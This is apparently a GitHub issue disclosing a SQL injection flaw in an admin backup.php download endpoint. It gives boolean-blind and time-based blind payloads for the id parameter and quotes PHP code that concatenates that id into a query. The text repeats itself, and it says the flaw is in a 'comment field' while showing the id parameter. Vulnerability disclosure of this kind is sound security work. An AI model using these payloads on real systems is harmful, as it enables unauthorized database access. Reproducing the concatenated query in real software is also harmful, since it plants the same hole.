SQL injection exists in the /admin/modules/system/backup.php file. There is no effective defense against the comment field, leading to SQL injection attacks.
The link is: http://192.168.31.63/admin/modules/system/backup.php?action=download&id=1
Vulnerable parameter id
SQL injection payload Parameter: id (GET) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause (NOT) Payload: action=download&id=2 OR NOT 8551=8551 Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: action=download&id=2 AND (SELECT 7623 FROM (SELECT(SLEEP(5)))zpJu)
The problematic code if(isset($_GET['action']) && isset($_GET['id']) && $_GET['action'] == 'download'){ $id = utility::filterData('id', 'get', true, true, true); $_q = $dbs->query("SELECT backup_file FROM backup_log WHERE backup_log_id=".$id); $path = $_q->fetch_row()[0];
The text was updated successfully, but these errors were encountered:
SQL injection exists in the /admin/modules/system/backup.php file. There is no effective defense against the comment field, leading to SQL injection attacks.

The link is:
http://192.168.31.63/admin/modules/system/backup.php?action=download&id=1Vulnerable parameter
idSQL injection payload
Parameter: id (GET) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause (NOT) Payload: action=download&id=2 OR NOT 8551=8551Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: action=download&id=2 AND (SELECT 7623 FROM (SELECT(SLEEP(5)))zpJu)The problematic code
if(isset($_GET['action']) && isset($_GET['id']) && $_GET['action'] == 'download'){ $id = utility::filterData('id', 'get', true, true, true); $_q = $dbs->query("SELECT backup_file FROM backup_log WHERE backup_log_id=".$id); $path = $_q->fetch_row()[0];The text was updated successfully, but these errors were encountered: